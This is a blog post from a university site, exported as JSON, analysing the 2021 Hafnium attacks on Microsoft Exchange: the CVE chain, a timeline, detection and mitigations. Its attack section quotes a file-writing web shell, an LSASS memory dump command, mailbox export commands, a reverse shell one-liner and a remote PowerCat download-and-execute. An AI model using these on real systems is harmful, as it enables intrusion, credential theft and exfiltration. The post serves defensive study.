{"id":20850,"date":"2021-08-30T18:13:56","date_gmt":"2021-08-30T16:13:56","guid":{"rendered":"https:\/\/blog.mi.hdm-stuttgart.de\/?p=20850"},"modified":"2023-08-06T21:41:01","modified_gmt":"2023-08-06T19:41:01","slug":"hafnium-exchange-server-attacks-what-happened-and-how-to-protect-yourself","status":"publish","type":"post","link":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/2021\/08\/30\/hafnium-exchange-server-attacks-what-happened-and-how-to-protect-yourself\/","title":{"rendered":"HAFNIUM EXCHANGE SERVER ATTACKS &#8211; What happened and how to protect yourself"},"content":{"rendered":"\n<p><em>an article by Carina Szkudlarek, Niklas Schildhauer and Jannik Smidt<\/em><\/p>\n\n\n\n<p>This post is going to review the zero day exploit of the Microsoft Exchange Servers starting in January 2021.<br>It will look into the methods of SSRF and the exploitation of mistakes in the deserialization of input values to procure privileged code execution.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/unknown.png\"><img loading=\"lazy\" decoding=\"async\" width=\"964\" height=\"308\" data-attachment-id=\"20852\" data-permalink=\"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/2021\/08\/30\/hafnium-exchange-server-attacks-what-happened-and-how-to-protect-yourself\/unknown\/\" data-orig-file=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/unknown.png\" data-orig-size=\"964,308\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"unknown\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/unknown.png\" src=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/unknown.png\" alt=\"\" class=\"wp-image-20852\" srcset=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/unknown.png 964w, https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/unknown-300x96.png 300w, https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/unknown-768x245.png 768w\" sizes=\"auto, (max-width: 964px) 100vw, 964px\" \/><\/a><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">INTRODUCTION<\/h2>\n\n\n\n<p>In early 2021, several vulnerabilities were discovered in the Microsoft Exchange server software of the 2010, 2013, 2016 and 2019 releases that could be used by attackers to gain access to such an Exchange server.<\/p>\n\n\n\n<p>With Exchange Server, Microsoft offers a service with which e-mail communication can be controlled in networks, but electronic communication can also be checked for harmful files such as viruses. All incoming and outgoing e-mails end up on the corresponding Exchange server. From there they are distributed to the recipients. Although there are alternatives, numerous state and private-sector institutions around the world rely on Microsoft Exchange servers.<\/p>\n\n\n\n<p>On January 6, 2021 the security company Volexity observed several attacks via a previously unpublished Exchange vulnerability. In the course of the following weeks there were additional individual attacks on selected Exchange servers.<\/p>\n\n\n\n<p>Microsoft instantly planned to release a security patch. However, the responsible attacker group Hafnium had already started a large amount of mass scans starting several months prior to january 6th when the attack was first exploited (see R[17]) . Exchange servers that were vulnerable were automatically infected with a webshell. Less than a week later, Microsoft published several security updates. However only a few hours after the publication of these unscheduled updates for the known vulnerabilities, the unprecedented infection of all unpatched Exchange servers accessible via the Internet began. As a result, administrators had little time and opportunity to react.<\/p>\n\n\n\n<p>Generally, the exploit of overall four known vulnerabilities can be used as a gateway to penetrate deeper into the corporate network, as the Exchange servers are often publicly accessible. Yet it only affects on-premise Microsoft Exchange Server and not Exchange Online or Microsoft 365.<\/p>\n\n\n\n<p>According to estimates, generally around 250,000 Exchange servers worldwide are open like a barn door to cyberattacks. 30,000 US customers have already been hacked, according to Heise [R1] tens of thousands of Exchange servers are affected in Germany alone, some of them in German federal authorities, according to the BSI [see: R2]<\/p>\n\n\n\n<!--more-->\n\n\n\n<!--nextpage-->\n\n\n\n<h2 class=\"wp-block-heading\">WHY TARGET EXCHANGE SERVER?<\/h2>\n\n\n\n<p>Out of endless amounts of public targets, e-mail servers serve a promising choice for several reasons. For the most part,<span style=\"font-size: revert;color: initial\"> mail servers always keep confidential secrets. Especially Exchange Server is the most well-known mail solution for enterprises and governments worldwide. Also have public mail servers been the target for Nation-sponsored hackers for a long time already. More than 400,000 Exchange servers exposed on the Internet<\/span> [R16]. This also includes the assumption that all the data in the servers are stored unencrypted. The question arises on why an end-to-end encryption has been avoided all this time.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/3.png\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"827\" data-attachment-id=\"20856\" data-permalink=\"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/2021\/08\/30\/hafnium-exchange-server-attacks-what-happened-and-how-to-protect-yourself\/3-2\/\" data-orig-file=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/3.png\" data-orig-size=\"1600,1292\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"3\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/3-1024x827.png\" src=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/3-1024x827.png\" alt=\"\" class=\"wp-image-20856\" srcset=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/3-1024x827.png 1024w, https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/3-300x242.png 300w, https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/3-768x620.png 768w, https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/3-1536x1240.png 1536w, https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/3.png 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/a><figcaption class=\"wp-element-caption\"><em>Image Source<\/em> [R13]<\/figcaption><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">HAFNIUM<\/h2>\n\n\n\n<p>The attacks on Exchange Server were apparently started by a Chinese hacker group called Hafnium, which is said to have direct links with the Chinese government [R2]. The main intention of Hafnium seemed to tap into information primarily in the USA. The group aimed at a number of industries including infectious disease researchers, law firms, higher education institutions, defense companies, policy think tanks, and NGOs. As Hafnium is based in China it conducts its operations primarily from leased virtual private servers&nbsp;(VPS)&nbsp;in the United States [R2].<\/p>\n\n\n\n<p>In their report Microsoft states that prior to the Exchange Server attacks, Hafnium already compromised victims by exploiting security flaws in internet-connected servers and by using legitimate open source frameworks such as Covenant. The group aims to gain access to a victim network where then they filter data on file sharing sites like MEGA [R3]<\/p>\n\n\n\n<p>Additionally, in campaigns unrelated to these vulnerabilities, Microsoft has observed HAFNIUM interacting with the victim&#8217;s Office 365 tenants. While they often fail to compromise customer accounts, this intelligence activity helps the adversary to identify more details about the surroundings of their targets [R3].<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">SEQUENCE OF EVENTS <\/h2>\n\n\n\n<p><strong>January 3 2021:<\/strong> Cyber espionage operations against Microsoft Exchange Server begin using the Server-Side Request Forgery (SSRF) vulnerability CVE-2021-26855<\/p>\n\n\n\n<p><br><strong>January 5:<\/strong> Initial report to Microsoft of the four flaws by a principal security researcher for security testing firm DEVCORE.<\/p>\n\n\n\n<p><br><strong>January 6: <\/strong>Identification of the attacks on the previously discovered flaws by Volexity<\/p>\n\n\n\n<p><br><strong>Mach 2: <\/strong>Microsoft releases emergency security updates to plug the four zero-day flaws in Exchange version 2013-2019 to counter the Hafnium attack.<\/p>\n\n\n\n<p><br><strong>March 3:<\/strong> The CISS issues an emergency directive for all federal agencies to disconnect from Microsoft Exchange on-premises servers and begin incident response procedures &#8211; Tens of thousands of Exchange servers have already been compromised worldwide, with thousands more servers getting freshly hacked each hour<\/p>\n\n\n\n<p><br><strong>March 5-8:<\/strong> Microsoft assumes further attacks by actors beyond Hafnium, targeting the same vulnerabilities the Chinese group exploited.<\/p>\n\n\n\n<p><br><strong>March 9:<\/strong> (\u201cPatch Tuesday&#8221; ) Original publish date for the security updates \u2794 Patch of 82 security holes in Windows and other software, including a zero-day vulnerability in its web browser software.<\/p>\n\n\n\n<p><br><strong>March 10:<\/strong> At least 10 \u201cadvanced persistent threat\u201d (APT) cybercrime and espionage groups have been exploiting the Exchange flaws for their own purposes.<\/p>\n\n\n\n<p><br><strong>March 13:<\/strong> The CISA adds seven Malware Analyst Reports to identify web shells associated with Exchange vulnerabilities.<\/p>\n\n\n\n<p><br><strong>March 15:<\/strong> Microsoft releases a &#8220;one-click&#8221; On-Premises Mitigation Tool to assist customers who do not have dedicated IT security to apply updates to Exchange Server.&nbsp;<\/p>\n\n\n\n<p><br><strong>March 18: <\/strong>Microsoft announces their Defender Antivirus and System Center Endpoint Protection now automatically mitigates CVE-2021-26855 on any vulnerable server.&nbsp;<\/p>\n\n\n\n<p><br><strong>March 31: <\/strong>CISA releases supplemental direction on Emergency Directive for Exchange Server Vulnerabilities.<\/p>\n\n\n\n<p><br><strong>April 13: <\/strong>The FBI is granted a search and seizure warrant by a Texas court that allows the agency to copy and remove web shells from hundreds of on-premises Microsoft Exchange servers owned by private organizations.&nbsp;<\/p>\n\n\n\n<p>Considering that the state has to aid in fixing those security issues shows how dramatic the situation and how underdeveloped many company infrastructures are in regards to such incidents.<\/p>\n\n\n\n<p>See: [R11][R12]<\/p>\n\n\n\n<!--nextpage-->\n\n\n\n<h2 class=\"wp-block-heading\">VULNERABILITY<\/h2>\n\n\n\n<p>The current vulnerabilities in Exchange servers allows attackers to bypass regular authentication and log in as an administrator of an Exchange server. As part of the investigation, security researchers identified another vulnerability through which an attacker could place files for remote code execution in Exchange. From this they built a functional proof of concept exploit with which the Exchange authentication could be bypassed and the server therefore compromised.<\/p>\n\n\n\n<p><br>Since an Exchange server has high rights in the Active Directory, a successful attack on the e-mail system also gives the attacker the opportunity to attack the Active Directory and to access and change data as well as to attack other internal systems. Exploits for the proxy logon gap in Exchange Server are already circulating to where ransomware is also emerging following in several users reporting encrypted files.<\/p>\n\n\n\n<p>The four vulnerabilities form a chain of attacks (see [R3]):<\/p>\n\n\n\n<p><strong>CVE-2021-26855<\/strong> is a server-side request forgery (SSRF) vulnerability. It can be used remotely without authentication and without user interaction. Any HTTP requests can be sent by an attacker and allow him to authenticate himself as an Exchange server (admin).<\/p>\n\n\n\n<p><strong>CVE-2021-26857<\/strong> allows an attacker to run code as a SYSTEM on the Exchange server. This is a vulnerability related to insecure deserialization in the Unified Messaging service. In order to take advantage of this, administrator rights are required, which can be obtained via the aforementioned security gap or by compromising the access data of a legitimate administrator.<\/p>\n\n\n\n<p><strong>CVE-2021-26858<\/strong> and <strong>CVE-2021-27065<\/strong> are a post-authentication arbitrary file write vulnerability in Exchange. They allow any file to be written after it has been authenticated in Exchange. If Hafnium could authenticate with the Exchange server, they could take advantage of this vulnerability to write a file to any path on the server such as they could authenticate themselves using the SSRF vulnerability CVE-2021-26855 or the credentials of a legitimate administrator<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">ATTACK DETAILS<\/h2>\n\n\n\n<p>In their blog post [R3] , Microsoft is providing in depth details about the attack to help especially customers of Exchange but also individuals understand the techniques that were used by Hafnium. Therefore they desire to enable a more effective defense against any future attacks against unpatched systems. For those that are further interested in how the attack looked like, the following shall demonstrate one example of a web shell deployed by Hafnium. <\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;%@ Page Language=\u201eJscript\u201c%&gt;&lt;%System.IO.File.WriteAllText(Request.Item[\u201cp\u201c], Request.Item[\u201cc\u201c]);%&gt;<\/pre>\n\n\n\n<p>After providing the web shell, the Hafnium operators performed the following post-exploitation activities:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Using Procdump to dump the LSASS process memory:<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">C:\\windows\\temp\\procdump64 - accepteula -ma lass.exe C:\\windows\\temp\\lsass<\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Using 7-Zip to compress stolen data into ZIP files for exfiltration<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">c:\\ProgramData\\7z -t7z -r c:\\ProgramData\\it.zip c:\\ProgramData\\pst<\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Adding and using Exchange PowerShell snap-ins to export mailbox data:<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Mailbox&amp;#x0A<br>Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;Get-MailboxExportRequest -ResultSize100<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;Get-MailboxExportRequest|RemoveMailboxExportRequest -Confirm:$false<\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Using the Nishang Invoke-PowerShellTcpOneLine reverse shell:<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">powershell -mop -c \u201c$client = New-Object Net.Sockets.TCPClient(XXXXXXXXXXX);$stream =<br>$client.GetStream(); [byte[]]$bytes = 0. .65535|%{0};while(($i = $stream.Read($bytes, 0,<br>$bytes.Length)) -me 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString<br>($bytes,0, $I);$sendback = (iex $data 2&gt;&amp;1 | Out-String ); $sendback2); $sendback + \u2018PS \u2019 +<br>(pwd).Path + \u201a&gt; \u201a;$sendbyte.Length);$stream.Flush()};$client.Close()\u201c<\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Downloading PowerCat from GitHub, then using it to open a connection to a remote server:<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">IEX (New.Object System.Net.Webclient).DownloadString<br>(\u201ahttps:\/\/raw.githubusercontent.com\/besimorhino.powercat\/master\/powercat.ps1'); powercat -c<br>XXXXX -p XXX -e powershell<\/pre>\n\n\n\n<p>Hafnium is also said to having been able to download the Exchange offline address books from compromised systems, containing information about an organization and its users.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">DETECTING THE COMPROMISE <\/h2>\n\n\n\n<p>The detected vulnerabilities allow attackers, even without credentials, to read mails from any mailbox, to write any files on the Exchange server and to write their own code on the Exchange server in the the context of the system user. These three possibilities should therefore be checked for example by using the methods described below:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>Reading emails using CVE-2021-26855:<\/strong> The exploitation of this particular vulnerability can be traced by the means of log entries. In the case of Outlook on the Web or the Outlook Web App, an attacker uses POST requests for static content under the path <code class=\"\" data-line=\"\">\/ owa \/ auth \/ Current \/ themes \/ resources<\/code>.<br>With specially prepared SOAP payloads it is then possible to exfiltrate e-mails without authentication.<\/li>\n<\/ol>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>Anomalies in the ECP server logs:<\/strong> Notes on exploiting the remote code execution vulnerability can be found in the Exchange Control Panel server logs (usually found under<code class=\"\" data-line=\"\"> \\ Logging \\ ECP \\ Server<\/code> ), since the exploitation appears to be taking place in the context the <code class=\"\" data-line=\"\">Set-OabVirtualDirectory ExchangePowerShell <\/code>cmdlet. Therefore it would make sense to search for the string <code class=\"\" data-line=\"\">S: CMD = Set-OabVirtualDirectory.ExternalUrl = &#039;&quot;<\/code>. In particular, the string <code class=\"\" data-line=\"\">\u201cscript\u201d<\/code> within such a log entry could indicate the exploitation of the CVE-2021-27065 vulnerability.<\/li>\n<\/ol>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>Search for webshells:<\/strong> A typical approach taken by the attackers is to use the RCE vulnerability to leave a web shell on the server in order to execute further commands.<\/li>\n<\/ol>\n\n\n\n<p>The following webshells have already been observed in connection with the exploitation of the Exchange vulnerability:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>SIMPLESEESHARP<\/li>\n\n\n\n<li>SPORTSBALL<\/li>\n\n\n\n<li>China Chopper<\/li>\n\n\n\n<li>ASPXSPY<\/li>\n\n\n\n<li>reGeorg<\/li>\n<\/ul>\n\n\n\n<p>Therefore, it makes sense to search for webshells both specifically and generically:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The YARA rules under [Rot2021b] help with the search for webshells in the context of Hafnium.<\/li>\n\n\n\n<li>The YARA rules under [Rup2021] help with the search for generic webshells.<\/li>\n<\/ul>\n\n\n\n<p>In connection with the Exchange vulnerabilities, ASPX files in the following directories and subdirectories are also noticeable [R2]:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">\\inetpub\\wwwroot\\aspnet_client\\<br>\\\\FrontEnd\\HttpProxy\\ecp\\auth\\<br>\\\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\<br>\\\\FrontEnd\\HttpProxy\\owa\\auth\\\\<\/pre>\n\n\n\n<p>The search in the following directory, which contains ASPX files in a standard installation is somewhat more complex. Webshells can also be included in these legitimate files by adding a single line to them.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">\\ \\ FrontEnd \\ HttpProxy \\ owa \\ auth \\<br>(\u2794 Files that no longer correspond to the status of the standard installation)<\/pre>\n\n\n\n<p>Internet Information Service web servers compile ASP files into temporary libraries. The files with the name <code class=\"\" data-line=\"\">app_web __ [a-zA-Z0-9] {8} .dll <\/code>could therefore also possibly contain a webshell.<\/p>\n\n\n\n<p><em>Now what do these difficulties tell us about being able to detect the consequences at all?<\/em><br><em>Why can everything so easily be overwritten and why can the basic systems be manipulated without much effort and without it being detected?<br>This shows us that nowadays companies are stuck with the problem that they no longer know what is still correct and what is already compromised.<\/em><\/p>\n\n\n\n<p>Review see [R4]<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">METHODS OF PROTECTION<\/h2>\n\n\n\n<p>In order to early prevent or detect compromise the following methods could be used:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>Watchguard Security Services<\/strong><\/li>\n<\/ol>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Intrusion Prevention Service<\/strong>: IPS detects and blocks the first stage of the attack in the exploit chain. The prerequisite is an activated HTTPS deep inspection on an HTTPS proxy action, since the attack pattern is of course only recognized if the firewall can break the encrypted HTTPS stream. Signatures [7]:\n<ul class=\"wp-block-list\">\n<li>1138767 &#8211; WEB Microsoft Exchange Server Remote Code Execution Vulnerability -1&nbsp;(CVE-2021-26855)<\/li>\n\n\n\n<li>1138774 &#8211; WEB Microsoft Exchange Server Remote Code Execution Vulnerability &#8211; 2&nbsp;(CVE-2021-26855)<\/li>\n\n\n\n<li>1138775&nbsp;&#8211; WEB Microsoft Exchange Server Remote Code Execution Vulnerability &#8211; 3&nbsp;(CVE-2021-26855)<\/li>\n\n\n\n<li>1138776&nbsp;&#8211; WEB Microsoft Exchange Server Remote Code Execution Vulnerability &#8211; 4&nbsp;(CVE-2021-26855)<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Gateway AntiVirus:<\/strong> This method contains several signatures to identify and block the web shells used in the attack. A prerequisite is an HTTP proxy with activated gateway antivirus and, for HTTPS, also an activated HTTPS deep inspection on the outgoing HTTPS proxy action, which regulates access from the Exchange server to the Internet. In this case, the download of the web shells would be checked, recognized and prevented by HTTPS servers. Signatures [R7]:\n<ul class=\"wp-block-list\">\n<li><code class=\"\" data-line=\"\">Generic.SecChecker.A.7CFC55B3<\/code><\/li>\n\n\n\n<li><code class=\"\" data-line=\"\">Generic.ASP.Chopper.A.65171474<\/code><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>APT Blocker<\/strong>: APT Blocker detects malicious PowerShell backdoors. A corresponding proxy action for HTTP and HTTPS with deep inspection is also required here. The APT Blocker in the TDR host sensor might also be helpful.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Geolocation:<\/strong> The use of geolocation can also be a useful hurdle. Geolocation in the Exchange Policies have to be activated with restrictions only for the countries that are relevant for one individually. For example, only allow Europe (in regards to the IP locations of the customers&#8217; email servers). This is however not a 100% protection, but if the majority of all IPs on the Internet are already blocked when accessing the OWA \/ Exchange, they cannot carry out an attack. The servers would still be vulnerable from the system in the permitted countries or regions.<\/li>\n<\/ul>\n\n\n\n<ol class=\"wp-block-list\" start=\"2\">\n<li><strong>Access Portal in connection with Microsoft Exchange (Pre-Authentication):<\/strong><\/li>\n<\/ol>\n\n\n\n<p>The first level of attack requires an Exchange server to be exposed to the Internet (for example simple port forwarding with SNAT). An easy way to prevent this particular level is by protecting the Exchange server behind the Firebox&#8217;s access portal. In this case, a so-called pre-authentication takes place via the access portal, so that only requests with valid credentials are passed through to the exchange at all.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/4.png\"><img loading=\"lazy\" decoding=\"async\" width=\"964\" height=\"406\" data-attachment-id=\"20858\" data-permalink=\"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/2021\/08\/30\/hafnium-exchange-server-attacks-what-happened-and-how-to-protect-yourself\/4-2\/\" data-orig-file=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/4.png\" data-orig-size=\"964,406\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"4\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/4.png\" src=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/4.png\" alt=\"\" class=\"wp-image-20858\" srcset=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/4.png 964w, https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/4-300x126.png 300w, https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/4-768x323.png 768w\" sizes=\"auto, (max-width: 964px) 100vw, 964px\" \/><\/a><figcaption class=\"wp-element-caption\"><em>Image source <\/em>[R10]<\/figcaption><\/figure>\n\n\n\n<p>This has the advantage that the authentication is carried out against the e-mail domain and the Exchange can only be reached via <code class=\"\" data-line=\"\">https: \/\/ \/<\/code>, but no longer under <code class=\"\" data-line=\"\">https: \/\/<\/code> ; to where a pure scan of an IP range and OWA instances running randomly on the IP does not reach out from the start.<\/p>\n\n\n\n<p>Another security mechanism is the help of reverse proxy actions in the Access Portal configuration. Remote users can establish a secure connection to internal web applications and Microsoft Exchange services without a VPN client.<\/p>\n\n\n\n<ol class=\"wp-block-list\" start=\"3\">\n<li><strong>AuthPoint<\/strong><\/li>\n<\/ol>\n\n\n\n<p>By registering with an additional authentication factor, one can additionally secure web registrations. When the user tries to log in to an application that requires authentication, the AuthPoint authentication page appears. To log in, the user enters their AuthPoint password (if required) and selects an authentication method, for example a OneTime password or a push notification on the user&#8217;s mobile device.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/5.png\"><img loading=\"lazy\" decoding=\"async\" width=\"1002\" height=\"510\" data-attachment-id=\"20859\" data-permalink=\"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/2021\/08\/30\/hafnium-exchange-server-attacks-what-happened-and-how-to-protect-yourself\/5-2\/\" data-orig-file=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/5.png\" data-orig-size=\"1002,510\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"5\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/5.png\" src=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/5.png\" alt=\"\" class=\"wp-image-20859\" srcset=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/5.png 1002w, https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/5-300x153.png 300w, https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/5-768x391.png 768w\" sizes=\"auto, (max-width: 1002px) 100vw, 1002px\" \/><\/a><figcaption class=\"wp-element-caption\"><em>Image source <\/em>[R10]<\/figcaption><\/figure>\n\n\n\n<p><em><span class=\"has-inline-color has-vivid-red-color\"><strong>HOWEVER<\/strong>: It is to consider that all these methods are only working in retrospective and are not preventive against zero day exploits<\/span><\/em><\/p>\n\n\n\n<p>Review see [R5]<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">MICROSOFT\u2019S REACTION <\/h2>\n\n\n\n<p>In order to protect their customers, Microsoft explained to focus on the exploits that make the attacks possible in the first place. As mentioned, Microsoft has soon released security updates with which they claim to protect their customers who use Exchange Server. However, actors and criminal groups act very quickly to exploit unpatched systems. Therefore installing the promoted patches immediately is said to be the best defense against this particular and most attacks in general. Microsoft therefore advises all Exchange Server customers to identify the numerous vulnerable exchange server and install these Microsoft issued security updates immediately [R8]. Also Exchange Server is primarily used by business customers. There currently is no evidence that the Hafnium attacks are targeting individual consumers or that they affect other Microsoft products.<\/p>\n\n\n\n<p>In March Microsoft also released the One-Click Microsoft Exchange On-Premises Mitigation Tool (EOMT) [R9]. This tool is a response from Microsoft to help all affected customer to immediately and easily update all their exchange server with an automated solution for both current and out-of-support versions.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/6.png\"><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"20860\" data-permalink=\"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/2021\/08\/30\/hafnium-exchange-server-attacks-what-happened-and-how-to-protect-yourself\/6-2\/\" data-orig-file=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/6.png\" data-orig-size=\"1536,785\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"6\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/6-1024x523.png\" src=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/6-1024x523.png\" alt=\"\" class=\"wp-image-20860\" width=\"840\" height=\"429\" srcset=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/6-1024x523.png 1024w, https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/6-300x153.png 300w, https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/6-768x393.png 768w, https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/6.png 1536w\" sizes=\"auto, (max-width: 840px) 100vw, 840px\" \/><\/a><figcaption class=\"wp-element-caption\"><em>Image source 